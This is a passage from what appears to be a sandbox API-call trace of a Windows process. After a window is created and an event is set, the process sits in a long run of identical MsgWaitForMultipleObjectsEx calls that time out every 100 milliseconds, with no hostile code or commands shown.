nHeight=0, hWndParent=0x0, hMenu=0x0, hInstance=0x400000, lpParam=0x0) returned 0x5021e [0176.280] NtdllDefWindowProc_W () returned 0x1 [0176.282] NtdllDefWindowProc_W () returned 0x0 [0176.282] NtdllDefWindowProc_W () returned 0x0 [0176.282] NtdllDefWindowProc_W () returned 0x0 [0176.282] NtdllDefWindowProc_W () returned 0x0 [0176.284] SetEvent (hEvent=0x290) returned 1 [0176.300] MsgWaitForMultipleObjectsEx (nCount=0x0, pHandles=0x0, dwMilliseconds=0x64, dwWakeMask=0xff, dwFlags=0x4) returned 0x102 [0176.493] MsgWaitForMultipleObjectsEx (nCount=0x0, pHandles=0x0, dwMilliseconds=0x64, dwWakeMask=0xff, dwFlags=0x4) returned 0x102 [0176.650] MsgWaitForMultipleObjectsEx (nCount=0x0, pHandles=0x0, dwMilliseconds=0x64, dwWakeMask=0xff, dwFlags=0x4) returned 0x102 [0176.832] MsgWaitForMultipleObjectsEx (nCount=0x0, pHandles=0x0, dwMilliseconds=0x64, dwWakeMask=0xff, dwFlags=0x4) returned 0x102 [0177.056] MsgWaitForMultipleObjectsEx (nCount=0x0, pHandles=0x0, dwMilliseconds=0x64, dwWakeMask=0xff, dwFlags=0x4) returned 0x102 [0177.261] MsgWaitForMultipleObjectsEx (nCount=0x0, pHandles=0x0, dwMilliseconds=0x64, dwWakeMask=0xff, dwFlags=0x4) returned 0x102 [0177.414] MsgWaitForMultipleObjectsEx (nCount=0x0, pHandles=0x0, dwMilliseconds=0x64, dwWakeMask=0xff, dwFlags=0x4) returned 0x102 [0177.572] MsgWaitForMultipleObjectsEx (nCount=0x0, pHandles=0x0, dwMilliseconds=0x64, dwWakeMask=0xff, dwFlags=0x4) returned 0x102 [0177.769] MsgWaitForMultipleObjectsEx (nCount=0x0, pHandles=0x0, dwMilliseconds=0x64, dwWakeMask=0xff, dwFlags=0x4) returned 0x102 [0178.023] MsgWaitForMultipleObjectsEx (nCount=0x0, pHandles=0x0, dwMilliseconds=0x64, dwWakeMask=0xff, dwFlags=0x4) returned 0x102 [0178.223] MsgWaitForMultipleObjectsEx (nCount=0x0, pHandles=0x0, dwMilliseconds=0x64, dwWakeMask=0xff, dwFlags=0x4) returned 0x102 [0178.429] MsgWaitForMultipleObjectsEx (nCount=0x0, pHandles=0x0, dwMilliseconds=0x64, dwWakeMask=0xff, dwFlags=0x4) returned 0x102 [0179.722] MsgWaitForMultipleObjectsEx (nCount=0x0, pHandles=0x0, dwMilliseconds=0x64, dwWakeMask=0xff, dwFlags=0x4) returned 0x102 [0179.914] MsgWaitForMultipleObjectsEx (nCount=0x0, pHandles=0x0, dwMilliseconds=0x64, dwWakeMask=0xff, dwFlags=0x4) returned 0x102 [0180.069] MsgWaitForMultipleObjectsEx (nCount=0x0, pHandles=0x0, dwMilliseconds=0x64, dwWakeMask=0xff, dwFlags=0x4) returned 0x102 [0180.252] MsgWaitForMultipleObjectsEx (nCount=0x0, pHandles=0x0, dwMilliseconds=0x64, dwWakeMask=0xff, dwFlags=0x4) returned 0x102 [0180.407] MsgWaitForMultipleObjectsEx (nCount=0x0, pHandles=0x0, dwMilliseconds=0x64, dwWakeMask=0xff, dwFlags=0x4) returned 0x102 [0180.566] MsgWaitForMultipleObjectsEx (nCount=0x0, pHandles=0x0, dwMilliseconds=0x64, dwWakeMask=0xff, dwFlags=0x4) returned 0x102 [0180.760] MsgWaitForMultipleObjectsEx (nCount=0x0, pHandles=0x0, dwMilliseconds=0x64, dwWakeMask=0xff, dwFlags=0x4) returned 0x102 [0180.993] MsgWaitForMultipleObjectsEx (nCount=0x0, pHandles=0x0, dwMilliseconds=0x64, dwWakeMask=0xff, dwFlags=0x4) returned 0x102 [0181.170] MsgWaitForMultipleObjectsEx (nCount=0x0, pHandles=0x0, dwMilliseconds=0x64, dwWakeMask=0xff, dwFlags=0x4) returned 0x102 [0181.352] MsgWaitForMultipleObjectsEx (nCount=0x0, pHandles=0x0, dwMilliseconds=0x64, dwWakeMask=0xff, dwFlags=0x4) returned 0x102 [0181.679] MsgWaitForMultipleObjectsEx (nCount=0x0, pHandles=0x0, dwMilliseconds=0x64, dwWakeMask=0xff, dwFlags=0x4) returned 0x102 [0181.884] MsgWaitForMultipleObjectsEx (nCount=0x0, pHandles=0x0, dwMilliseconds=0x64, dwWakeMask=0xff, dwFlags=0x4) returned 0x102 [0182.414] MsgWaitForMultipleObjectsEx (nCount=0x0, pHandles=0x0, dwMilliseconds=0x64, dwWakeMask=0xff, dwFlags=0x4) returned 0x102 [0182.708] MsgWaitForMultipleObjectsEx (nCount=0x0, pHandles=0x0, dwMilliseconds=0x64, dwWakeMask=0xff, dwFlags=0x4) returned 0x102 [0182.842] MsgWaitForMultipleObjectsEx (nCount=0x0, pHandles=0x0, dwMilliseconds=0x64, dwWakeMask=0xff, dwFlags=0x4) returned 0x102 [0183.076] MsgWaitForMultipleObjectsEx (nCount=0x0, pHandles=0x0, dwMilliseconds=0x64, dwWakeMask=0xff, dwFlags=0x4) returned 0x102 [0183.340] MsgWaitForMultipleObjectsEx (nCount=0x0, pHandles=0x0, dwMilliseconds=0x64, dwWakeMask=0xff, dwFlags=0x4) returned 0x102 [0183.606] MsgWaitForMultipleObjectsEx (nCount=0x0, pHandles=0x0, dwMilliseconds=0x64, dwWakeMask=0xff, dwFlags=0x4) returned 0x102 [0183.840] MsgWaitForMultipleObjectsEx (nCount=0x0, pHandles=0x0, dwMilliseconds=0x64, dwWakeMask=0xff, dwFlags=0x4) returned 0x102 [0184.043] MsgWaitForMultipleObjectsEx (nCount=0x0, pHandles=0x0, dwMilliseconds=0x64, dwWakeMask=0xff, dwFlags=0x4) returned 0x102 [0184.310] MsgWaitForMultipleObjectsEx (nCount=0x0, pHandles=0x0, dwMilliseconds=0x64, dwWakeMask=0xff, dwFlags=0x4) returned 0x102 [0184.859] MsgWaitForMultipleObjectsEx (nCount=0x0, pHandles=0x0, dwMilliseconds=0x64, dwWakeMask=0xff, dwFlags=0x4) returned 0x102 [0185.493] MsgWaitForMultipleObjectsEx (nCount=0x0, pHandles=0x0, dwMilliseconds=0x64, dwWakeMask=0xff, dwFlags=0x4) returned 0x102 [0185.760] MsgWaitForMultipleObjectsEx (nCount=0x0, pHandles=0x0, dwMilliseconds=0x64, dwWakeMask=0xff, dwFlags=0x4) returned 0x102 [0186.097] MsgWaitForMultipleObjectsEx (nCount=0x0, pHandles=0x0, dwMilliseconds=0x64, dwWakeMask=0xff, dwFlags=0x4) returned 0x102 [0186.878] MsgWaitForMultipleObjectsEx (nCount=0x0, pHandles=0x0, dwMilliseconds=0x64, dwWakeMask=0xff, dwFlags=0x4) returned 0x102 [0187.129] MsgWaitForMultipleObjectsEx (nCount=0x0, pHandles=0x0, dwMilliseconds=0x64, dwWakeMask=0xff, dwFlags=0x4) returned 0x102 [0187.308] MsgWaitForMultipleObjectsEx (nCount=0x0, pHandles=0x0, dwMilliseconds=0x64, dwWakeMask=0xff, dwFlags=0x4) returned 0x102 [0187.537] MsgWaitForMultipleObjectsEx (nCount=0x0, pHandles=0x0, dwMilliseconds=0x64, dwWakeMask=0xff, dwFlags=0x4) returned 0x102 [0187.755] MsgWaitForMultipleObjectsEx (nCount=0x0, pHandles=0x0, dwMilliseconds=0x64, dwWakeMask=0xff, dwFlags=0x4) returned 0x102 [0187.968] MsgWaitForMultipleObjectsEx (nCount=0x0, pHandles=0x0, dwMilliseconds=0x64, dwWakeMask=0xff, dwFlags=0x4) returned 0x102 [0188.116] MsgWaitForMultipleObjectsEx (nCount=0x0, pHandles=0x0, dwMilliseconds=0x64, dwWakeMask=0xff, dwFlags=0x4) returned 0x102 [0188.379] MsgWaitForMultipleObjectsEx (nCount=0x0, pHandles=0x0, dwMilliseconds=0x64, dwWakeMask=0xff, dwFlags=0x4) returned 0x102 [0188.541] MsgWaitForMultipleObjectsEx (nCount=0x0, pHandles=0x0, dwMilliseconds=0x64, dwWakeMask=0xff, dwFlags=0x4) returned 0x102 [0188.707] MsgWaitForMultipleObjectsEx (nCount=0x0, pHandles=0x0, dwMilliseconds=0x64, dwWakeMask=0xff, dwFlags=0x4) returned 0x102 [0188.878] MsgWaitForMultipleObjectsEx (nCount=0x0, pHandles=0x0, dwMilliseconds=0x64, dwWakeMask=0xff, dwFlags=0x4) returned 0x102 [0189.112] MsgWaitForMultipleObjectsEx (nCount=0x0, pHandles=0x0, dwMilliseconds=0x64, dwWakeMask=0xff, dwFlags=0x4) returned 0x102 [0189.456] MsgWaitForMultipleObjectsEx (nCount=0x0, pHandles=0x0, dwMilliseconds=0x64, dwWakeMask=0xff, dwFlags=0x4) returned 0x102 [0189.752] MsgWaitForMultipleObjectsEx (nCount=0x0, pHandles=0x0, dwMilliseconds=0x64, dwWakeMask=0xff, dwFlags=0x4) returned 0x102 [0189.939] MsgWaitForMultipleObjectsEx (nCount=0x0, pHandles=0x0, dwMilliseconds=0x64, dwWakeMask=0xff, dwFlags=0x4) returned 0x102 [0190.225] MsgWaitForMultipleObjectsEx (nCount=0x0, pHandles=0x0, dwMilliseconds=0x64, dwWakeMask=0xff, dwFlags=0x4) returned 0x102 [0190.438] MsgWaitForMultipleObjectsEx (nCount=0x0, pHandles=0x0, dwMilliseconds=0x64, dwWakeMask=0xff, dwFlags=0x4) returned 0x102 [0190.600] MsgWaitForMultipleObjectsEx (nCount=0x0, pHandles=0x0, dwMilliseconds=0x64, dwWakeMask=0xff, dwFlags=0x4) returned 0x102 [0190.797] MsgWaitForMultipleObjectsEx (nCount=0x0, pHandles=0x0, dwMilliseconds=0x64, dwWakeMask=0xff, dwFlags=0x4) returned 0x102 [0190.951] MsgWaitForMultipleObjectsEx (nCount=0x0, pHandles=0x0, dwMilliseconds=0x64, dwWakeMask=0xff, dwFlags=0x4) returned 0x102 [0191.115] MsgWaitForMultipleObjectsEx (nCount=0x0, pHandles=0x0, dwMilliseconds=0x64, dwWakeMask=0xff, dwFlags=0x4) returned 0x102 [0191.312] MsgWaitForMultipleObjectsEx (nCount=0x0, pHandles=0x0, dwMilliseconds=0x64, dwWakeMask=0xff, dwFlags=0x4) returned 0x102 [0191.481] MsgWaitForMultipleObjectsEx (nCount=0x0, pHandles=0x0, dwMilliseconds=0x64, dwWakeMask=0xff, dwFlags=0x4) returned 0x102 [0192.220] MsgWaitForMultipleObjectsEx (nCount=0x0, pHandles=0x0, dwMilliseconds=0x64, dwWakeMask=0xff, dwFlags=0x4) returned 0x102 [0192.435] MsgWaitForMultipleObjectsEx (nCount=0x0, pHandles=0x0, dwMilliseconds=0x64, dwWakeMask=0xff, dwFlags=0x4) returned 0x102 [0192.747] MsgWaitForMultipleObjectsEx (nCount=0x0, pHandles=0x0, dwMilliseconds=0x64, dwWakeMask=0xff, dwFlags=0x4) returned 0x102 [0192.981] MsgWaitForMultipleObjectsEx (nCount=0x0, pHandles=0x0, dwMilliseconds=0x64, dwWakeMask=0xff, dwFlags=0x4) returned 0x102 [0193.906] MsgWaitForMultipleObjectsEx (nCount=0x0, pHandles=0x0, dwMilliseconds=0x64, dwWakeMask=0xff, dwFlags=0x4) returned 0x102 [0194.077] MsgWaitForMultipleObjectsEx (nCount=0x0, pHandles=0x0, dwMilliseconds=0x64, dwWakeMask=0xff, dwFlags=0x4) returned 0x102 [0194.249] MsgWaitForMultipleObjectsEx (nCount=0x0, pHandles=0x0, dwMilliseconds=0x64, dwWakeMask=0xff, dwFlags=0x4) returned 0x102 [0194.402] MsgWaitForMultipleObjectsEx (nCount=0x0, pHandles=0x0, dwMilliseconds=0x64, dwWakeMask=0xff, dwFlags=0x4) returned 0x102 [0194.572] MsgWaitForMultipleObjectsEx (nCount=0x0, pHandles=0x0, dwMilliseconds=0x64, dwWakeMask=0xff, dwFlags=0x4) returned 0x102 [0194.760] MsgWaitForMultipleObjectsEx (nCount=0x0, pHandles=0x0, dwMilliseconds=0x64, dwWakeMask=0xff, dwFlags=0x4) returned 0x102 [0194.923] MsgWaitForMultipleObjectsEx (nCount=0x0, pHandles=0x0, dwMilliseconds=0x64, dwWakeMask=0xff, dwFlags=0x4) returned 0x102 [0195.088] MsgWaitForMultipleObjectsEx (nCount=0x0, pHandles=0x0, dwMilliseconds=0x64, dwWakeMask=0xff, dwFlags=0x4) returned 0x102 [0195.212] MsgWaitForMultipleObjectsEx (nCount=0x0, pHandles=0x0, dwMilliseconds=0x64, dwWakeMask=0xff, dwFlags=0x4) returned 0x102 [0195.380] MsgWaitForMultipleObjectsEx (nCount=0x0, pHandles=0x0, dwMilliseconds=0x64, dwWakeMask=0xff, dwFlags=0x4) returned 0x102 [0195.545] MsgWaitForMultipleObjectsEx (nCount=0x0, pHandles=0x0, dwMilliseconds=0x64, dwWakeMask=0xff, dwFlags=0x4) returned 0x102 [0195.696] MsgWaitForMultipleObjectsEx (nCount=0x0, pHandles=0x0, dwMilliseconds=0x64, dwWakeMask=0xff, dwFlags=0x4) returned 0x102 [0195.867] MsgWaitForMultipleObjectsEx (nCount=0x0, pHandles=0x0, dwMilliseconds=0x64, dwWakeMask=0xff, dwFlags=0x4) returned 0x102 [0196.039] MsgWaitForMultipleObjectsEx (nCount=0x0, pHandles=0x0, dwMilliseconds=0x64, dwWakeMask=0xff, dwFlags=0x4) returned 0x102 [0196.212] MsgWaitForMultipleObjectsEx (nCount=0x0, pHandles=0x0, dwMilliseconds=0x64, dwWakeMask=0xff, dwFlags=0x4) returned 0x102 [0196.336] MsgWaitForMultipleObjectsEx (nCount=0x0, pHandles=0x0, dwMilliseconds=0x64, dwWakeMask=0xff, dwFlags=0x4) returned 0x102 [0196.519] MsgWaitForMultipleObjectsEx (nCount=0x0, pHandles=0x0, dwMilliseconds=0x64, dwWakeMask=0xff, dwFlags=0x4) returned 0x102 [0196.695] MsgWaitForMultipleObjectsEx (nCount=0x0, pHandles=0x0, dwMilliseconds=0x64, dwWakeMask=0xff, dwFlags=0x4) returned 0x102 [0196.866] MsgWaitForMultipleObjectsEx (nCount=0x0, pHandles=0x0, dwMilliseconds=0x64, dwWakeMask=0xff, dwFlags=0x4) returned 0x102 [0196.990] MsgWaitForMultipleObjectsEx (nCount=0x0, pHandles=0x0, dwMilliseconds=0x64, dwWakeMask=0xff, dwFlags=0x4) returned 0x102 [0197.171] MsgWaitForMultipleObjectsEx (nCount=0x0, pHandles=0x0, dwMilliseconds=0x64, dwWakeMask=0xff, dwFlags=0x4) returned 0x102 [0197.286] MsgWaitForMultipleObjectsEx (nCount=0x0, pHandles=0x0, dwMilliseconds=0x64, dwWakeMask=0xff, dwFlags=0x4) returned 0x102 [0197.418] MsgWaitForMultipleObjectsEx (nCount=0x0, pHandles=0x0, dwMilliseconds=0x64, dwWakeMask=0xff, dwFlags=0x4) returned 0x102 [0197.614] MsgWaitForMultipleObjectsEx (nCount=0x0, pHandles=0x0, dwMilliseconds=0x64, dwWakeMask=0xff, dwFlags=0x4) returned 0x102 [0197.786] MsgWaitForMultipleObjectsEx (nCount=0x0, pHandles=0x0, dwMilliseconds=0x64, dwWakeMask=0xff, dwFlags=0x4) returned 0x102 [0197.911] MsgWaitForMultipleObjectsEx (nCount=0x0, pHandles=0x0, dwMilliseconds=0x64, dwWakeMask=0xff, dwFlags=0x4) returned 0x102 [0198.083] MsgWaitForMultipleObjectsEx (nCount=0x0, pHandles=0x0, dwMilliseconds=0x64, dwWakeMask=0xff, dwFlags=0x4) returned 0x102 [0198.275] MsgWaitForMultipleObjectsEx (nCount=0x0, pHandles=0x0, dwMilliseconds=0x64, dwWakeMask=0xff, dwFlags=0x4) returned 0x102 [0198.427] MsgWaitForMultipleObjectsEx (nCount=0x0, pHandles=0x0, dwMilliseconds=0x64, dwWakeMask=0xff, dwFlags=0x4) returned 0x102 [0198.565] MsgWaitForMultipleObjectsEx (nCount=0x0, pHandles=0x0, dwMilliseconds=0x64, dwWakeMask=0xff, dwFlags=0x4) returned 0x102 [0198.738] MsgWaitForMultipleObjectsEx (nCount=0x0, pHandles=0x0, dwMilliseconds=0x64, dwWakeMask=0xff, dwFlags=0x4) returned 0x102 [0198.893] MsgWaitForMultipleObjectsEx (nCount=0x0, pHandles=0x0, dwMilliseconds=0x64, dwWakeMask=0xff, dwFlags=0x4) returned 0x102 [0199.024] MsgWaitForMultipleObjectsEx (nCount=0x0, pHandles=0x0, dwMilliseconds=0x64, dwWakeMask=0xff, dwFlags=0x4) returned 0x102 [0199.204] MsgWaitForMultipleObjectsEx (nCount=0x0, pHandles=0x0, dwMilliseconds=0x64, dwWakeMask=0xff, dwFlags=0x4) returned 0x102 [0199.346] MsgWaitForMultipleObjectsEx (nCount=0x0, pHandles=0x0, dwMilliseconds=0x64, dwWakeMask=0xff, dwFlags=0x4) returned 0x102 [0199.548] MsgWaitForMultipleObjectsEx (nCount=0x0, pHandles=0x0, dwMilliseconds=0x64, dwWakeMask=0xff, dwFlags=0x4) returned 0x102 [0199.718] MsgWaitForMultipleObjectsEx (nCount=0x0, pHandles=0x0, dwMilliseconds=0x64, dwWakeMask=0xff, dwFlags=0x4) returned 0x102 [0199.895] MsgWaitForMultipleObjectsEx (nCount=0x0, pHandles=0x0, dwMilliseconds=0x64, dwWakeMask=0xff, dwFlags=0x4) returned 0x102 [0200.176] MsgWaitForMultipleObjectsEx (nCount=0x0, pHandles=0x0, dwMilliseconds=0x64, dwWakeMask=0xff, dwFlags=0x4) returned 0x102 [0200.322] MsgWaitForMultipleObjectsEx (nCount=0x0, pHandles=0x0, dwMilliseconds=0x64, dwWakeMask=0xff, dwFlags=0x4) returned 0x102 [0200.532] MsgWaitForMultipleObjectsEx (nCount=0x0, pHandles=0x0, dwMilliseconds=0x64, dwWakeMask=0xff, dwFlags=0x4) returned 0x102 [0200.688] MsgWaitForMultipleObjectsEx (nCount=0x0, pHandles=0x0, dwMilliseconds=0x64, dwWakeMask=0xff, dwFlags=0x4) returned 0x102 [0200.861] MsgWaitForMultipleObjectsEx (nCount=0x0, pHandles=0x0, dwMilliseconds=0x64, dwWakeMask=0xff, dwFlags=0x4) returned 0x102 [0201.280] MsgWaitForMultipleObjectsEx (nCount=0x0, pHandles=0x0, dwMilliseconds=0x64, dwWakeMask=0xff, dwFlags=0x4) returned 0x102 [0202.155] MsgWaitForMultipleObjectsEx (nCount=0x0, pHandles=0x0, dwMilliseconds=0x64, dwWakeMask=0xff, dwFlags=0x4) returned 0x102 [0202.288] MsgWaitForMultipleObjectsEx (nCount=0x0, pHandles=0x0, dwMilliseconds=0x64, dwWakeMask=0xff, dwFlags=0x4) returned 0x102 [0202.748] MsgWaitForMultipleObjectsEx (nCount=0x0, pHandles=0x0, dwMilliseconds=0x64, dwWakeMask=0xff, dwFlags=0x4) returned 0x102 [0203.371] MsgWaitForMultipleObjectsEx (nCount=0x0, pHandles=0x0, dwMilliseconds=0x64, dwWakeMask=0xff, dwFlags=0x4) returned 0x102 [0203.961] MsgWaitForMultipleObjectsEx (nCount=0x0, pHandles=0x0, dwMilliseconds=0x64, dwWakeMask=0xff, dwFlags=0x4) returned 0x102 [0204.239] MsgWaitForMultipleObjectsEx (nCount=0x0, pHandles=0x0, dwMilliseconds=0x64, dwWakeMask=0xff, dwFlags=0x4) returned 0x102 [0204.496] MsgWaitForMultipleObjectsEx (nCount=0x0, pHandles=0x0, dwMilliseconds=0x64, dwWakeMask=0xff, dwFlags=0x4) returned 0x102 [0204.843] MsgWaitForMultipleObjectsEx (nCount=0x0, pHandles=0x0, dwMilliseconds=0x64, dwWakeMask=0xff, dwFlags=0x4) returned 0x102 [0205.056] MsgWaitForMultipleObjectsEx (nCount=0x0, pHandles=0x0, dwMilliseconds=0x64, dwWakeMask=0xff, dwFlags=0x4) returned 0x102 [0205.507] MsgWaitForMultipleObjectsEx (nCount=0x0, pHandles=0x0, dwMilliseconds=0x64, dwWakeMask=0xff, dwFlags=0x4) returned 0x102 [0205.836] MsgWaitForMultipleObjectsEx (nCount=0x0, pHandles=0x0, dwMilliseconds=0x64, dwWakeMask=0xff, dwFlags=0x4) returned 0x102 [0207.225] MsgWaitForMultipleObjectsEx (nCount=0x0, pHandles=0x0, dwMilliseconds=0x64, dwWakeMask=0xff, dwFlags=0x4) returned 0x102 [0207.499] MsgWaitForMultipleObjectsEx (nCount=0x0, pHandles=0x0, dwMilliseconds=0x64, dwWakeMask=0xff, dwFlags=0x4) returned 0x102 [0208.130] MsgWaitForMultipleObjectsEx (nCount=0x0, pHandles=0x0, dwMilliseconds=0x64, dwWakeMask=0xff, dwFlags=0x4) returned 0x102 [0208.802] MsgWaitForMultipleObjectsEx (nCount=0x0, pHandles=0x0, dwMilliseconds=0x64, dwWakeMask=0xff, dwFlags=0x4) returned 0x102 [0209.153] MsgWaitForMultipleObjectsEx (nCount=0x0, pHandles=0x0, dwMilliseconds=0x64, dwWakeMask=0xff, dwFlags=0x4) returned 0x102 [0209.432] MsgWaitForMultipleObjectsEx (nCount=0x0, pHandles=0x0, dwMilliseconds=0x64, dwWakeMask=0xff, dwFlags=0x4) returned 0x102 [0209.689] MsgWaitForMultipleObjectsEx (nCount=0x0, pHandles=0x0, dwMilliseconds=0x64, dwWakeMask=0xff, dwFlags=0x4) returned 0x102 [0209.892] MsgWaitForMultipleObjectsEx (nCount=0x0, pHandles=0x0, dwMilliseconds=0x64, dwWakeMask=0xff, dwFlags=0x4) returned 0x102 [0210.095] MsgWaitForMultipleObjectsEx (nCount=0x0, pHandles=0x0, dwMilliseconds=0x64, dwWakeMask=0xff, dwFlags=0x4) returned 0x102 [0210.423] MsgWaitForMultipleObjectsEx (nCount=0x0, pHandles=0x0, dwMilliseconds=0x64, dwWakeMask=0xff, dwFlags=0x4) returned 0x102 [0210.687] MsgWaitForMultipleObjectsEx (nCount=0x0, pHandles=0x0, dwMilliseconds=0x64, dwWakeMask=0xff, dwFlags=0x4) returned 0x102 [0210.952] MsgWaitForMultipleObjectsEx (nCount=0x0, pHandles=0x0, dwMilliseconds=0x64, dwWakeMask=0xff, dwFlags=0x4) returned 0x102 [0211.233] MsgWaitForMultipleObjectsEx (nCount=0x0, pHandles=0x0, dwMilliseconds=0x64, dwWakeMask=0xff, dwFlags=0x4) returned 0x102 [0211.532] MsgWaitForMultipleObjectsEx (nCount=0x0, pHandles=0x0, dwMilliseconds=0x64, dwWakeMask=0xff, dwFlags=0x4) returned 0x102 [0211.782] MsgWaitForMultipleObjectsEx (nCount=0x0, pHandles=0x0, dwMilliseconds=0x64, dwWakeMask=0xff, dwFlags=0x4) returned 0x102 [0212.054] MsgWaitForMultipleObjectsEx (nCount=0x0, pHandles=0x0, dwMilliseconds=0x64, dwWakeMask=0xff, dwFlags=0x4) returned 0x102 [0212.265] MsgWaitForMultipleObjectsEx (nCount=0x0, pHandles=0x0, dwMilliseconds=0x64, dwWakeMask=0xff, dwFlags=0x4) returned 0x102 [0212.509] MsgWaitForMultipleObjectsEx (nCount=0x0, pHandles=0x0, dwMilliseconds=0x64, dwWakeMask=0xff, dwFlags=0x4) returned 0x102 [0212.732] MsgWaitForMultipleObjectsEx (nCount=0x0, pHandles=0x0, dwMilliseconds=0x64, dwWakeMask=0xff, dwFlags=0x4) returned 0x102 [0213.045] MsgWaitForMultipleObjectsEx (nCount=0x0, pHandles=0x0, dwMilliseconds=0x64, dwWakeMask=0xff, dwFlags=0x4) returned 0x102 [0213.202] MsgWaitForMultipleObjectsEx (nCount=0x0, pHandles=0x0, dwMilliseconds=0x64, dwWakeMask=0xff, dwFlags=0x4) returned 0x102 [0213.324] MsgWaitForMultipleObjectsEx (nCount=0x0, pHandles=0x0, dwMilliseconds=0x64, dwWakeMask=0xff, dwFlags=0x4) returned 0x102 [0213.462] MsgWaitForMultipleObjectsEx (nCount=0x0, pHandles=0x0, dwMilliseconds=0x64, dwWakeMask=0xff, dwFlags=0x4) returned 0x102 [0213.593] MsgWaitForMultipleObjectsEx (nCount=0x0, pHandles=0x0, dwMilliseconds=0x64, dwWakeMask=0xff, dwFlags=0x4) returned 0x102 [0213.759] MsgWaitForMultipleObjectsEx (nCount=0x0, pHandles=0x0, dwMilliseconds=0x64, dwWakeMask=0xff, dwFlags=0x4) returned 0x102 [0213.920] MsgWaitForMultipleObjectsEx (nCount=0x0, pHandles=0x0, dwMilliseconds=0x64, dwWakeMask=0xff, dwFlags=0x4) returned 0x102 [0214.045] MsgWaitForMultipleObjectsEx (nCount=0x0, pHandles=0x0, dwMilliseconds=0x64, dwWakeMask=0xff, dwFlags=0x4) returned 0x102 [0214.226] MsgWaitForMultipleObjectsEx (nCount=0x0, pHandles=0x0, dwMilliseconds=0x64, dwWakeMask=0xff, dwFlags=0x4) returned 0x102 [0214.493] MsgWaitForMultipleObjectsEx (nCount=0x0, pHandles=0x0, dwMilliseconds=0x64, dwWakeMask=0xff, dwFlags=0x4) returned 0x102 [0214.688] MsgWaitForMultipleObjectsEx (nCount=0x0, pHandles=0x0, dwMilliseconds=0x64, dwWakeMask=0xff, dwFlags=0x4) returned 0x102 [0214.887] MsgWaitForMultipleObjectsEx (nCount=0x0, pHandles=0x0, dwMilliseconds=0x64, dwWakeMask=0xff, dwFlags=0x4) returned 0x102 [0215.118] MsgWaitForMultipleObjectsEx (nCount=0x0, pHandles=0x0, dwMilliseconds=0x64, dwWakeMask=0xff, dwFlags=0x4) returned 0x102 [0215.258] MsgWaitForMultipleObjectsEx (nCount=0x0, pHandles=0x0, dwMilliseconds=0x64, dwWakeMask=0xff, dwFlags=0x4) returned 0x102 [0215.611] MsgWaitForMultipleObjectsEx (nCount=0x0, pHandles=0x0, dwMilliseconds=0x64, dwWakeMask=0xff, dwFlags=0x4) returned 0x102 [0215.774] MsgWaitForMultipleObjectsEx (nCount=0x0, pHandles=0x0, dwMilliseconds=0x64, dwWakeMask=0xff, dwFlags=0x4) returned 0x102 [0215.979] MsgWaitForMultipleObjectsEx (nCount=0x0, pHandles=0x0, dwMilliseconds=0x64, dwWakeMask=0xff, dwFlags=0x4) returned 0x102 [0216.147] MsgWaitForMultipleObjectsEx (nCount=0x0, pHandles=0x0, dwMilliseconds=0x64, dwWakeMask=0xff, dwFlags=0x4) returned 0x102 [0216.272] MsgWaitForMultipleObjectsEx (nCount=0x0, pHandles=0x0, dwMilliseconds=0x64, dwWakeMask=0xff, dwFlags=0x4) returned 0x102 [0216.476] MsgWaitForMultipleObjectsEx (nCount=0x0, pHandles=0x0, dwMilliseconds=0x64, dwWakeMask=0xff, dwFlags=0x4) returned 0x102 [0216.615] MsgWaitForMultipleObjectsEx (nCount=0x0, pHandles=0x0, dwMilliseconds=0x64, dwWakeMask=0xff, dwFlags=0x4) returned 0x102 [0216.916] MsgWaitForMultipleObjectsEx (nCount=0x0, pHandles=0x0, dwMilliseconds=0x64, dwWakeMask=0xff, dwFlags=0x4) returned 0x102 [0217.162] MsgWaitForMultipleObjectsEx (nCount=0x0, pHandles=0x0, dwMilliseconds=0x64, dwWakeMask=0xff, dwFlags=0x4) returned 0x102 [0217.375] MsgWaitForMultipleObjectsEx (nCount=0x0, pHandles=0x0, dwMilliseconds=0x64, dwWakeMask=0xff, dwFlags=0x4) returned 0x102 [0217.568] MsgWaitForMultipleObjectsEx (nCount=0x0, pHandles=0x0, dwMilliseconds=0x64, dwWakeMask=0xff, dwFlags=0x4) returned 0x102 [0217.722] MsgWaitForMultipleObjectsEx (nCount=0x0, pHandles=0x0, dwMilliseconds=0x64, dwWakeMask=0xff, dwFlags=0x4) returned 0x102 [0217.901] MsgWaitForMultipleObjectsEx (nCount=0x0, pHandles=0x0, dwMilliseconds=0x64, dwWakeMask=0xff, dwFlags=0x4) returned 0x102 [0218.021] MsgWaitForMultipleObjectsEx (nCount=0x0, pHandles=0x0, dwMilliseconds=0x64, dwWakeMask=0xff, dwFlags=0x4) returned 0x102 [0218.160] MsgWaitForMultipleObjectsEx (nCount=0x0, pHandles=0x0, dwMilliseconds=0x64, dwWakeMask=0xff, dwFlags=0x4) returned 0x102 [0218.316] MsgWaitForMultipleObjectsEx (nCount=0x0, pHandles=0x0, dwMilliseconds=0x64, dwWakeMask=0xff, dwFlags=0x4) returned 0x102 [0218.487] MsgWaitForMultipleObjectsEx (nCount=0x0, pHandles=0x0, dwMilliseconds=0x64, dwWakeMask=0xff, dwFlags=0x4) returned 0x102 [0218.612] MsgWaitForMultipleObjectsEx (nCount=0x0, pHandles=0x0, dwMilliseconds=0x64, dwWakeMask=0xff, dwFlags=0x4) returned 0x102 [0218.810] MsgWaitForMultipleObjectsEx (nCount=0x0, pHandles=0x0, dwMilliseconds=0x64, dwWakeMask=0xff, dwFlags=0x4) returned 0x102 [0218.985] MsgWaitForMultipleObjectsEx (nCount=0x0, pHandles=0x0, dwMilliseconds=0x64, dwWakeMask=0xff, dwFlags=0x4) returned 0x102 [0219.095] MsgWaitForMultipleObjectsEx (nCount=0x0, pHandles=0x0, dwMilliseconds=0x64, dwWakeMask=0xff, dwFlags=0x4) returned 0x102 [0219.253] MsgWaitForMultipleObjectsEx (nCount=0x0, pHandles=0x0, dwMilliseconds=0x64, dwWakeMask=0xff, dwFlags=0x4) returned 0x102 [0219.417] MsgWaitForMultipleObjectsEx (nCount=0x0, pHandles=0x0, dwMilliseconds=0x64, dwWakeMask=0xff, dwFlags=0x4) returned 0x102 [0219.532] MsgWaitForMultipleObjectsEx (nCount=0x0, pHandles=0x0, dwMilliseconds=0x64, dwWakeMask=0xff, dwFlags=0x4) returned 0x102 [0219.673] MsgWaitForMultipleObjectsEx (nCount=0x0, pHandles=0x0, dwMilliseconds=0x64, dwWakeMask=0xff, dwFlags=0x4) returned 0x102 [0219.845] MsgWaitForMultipleObjectsEx (nCount=0x0, pHandles=0x0, dwMilliseconds=0x64, dwWakeMask=0xff, dwFlags=0x4) returned 0x102 [0219.981] 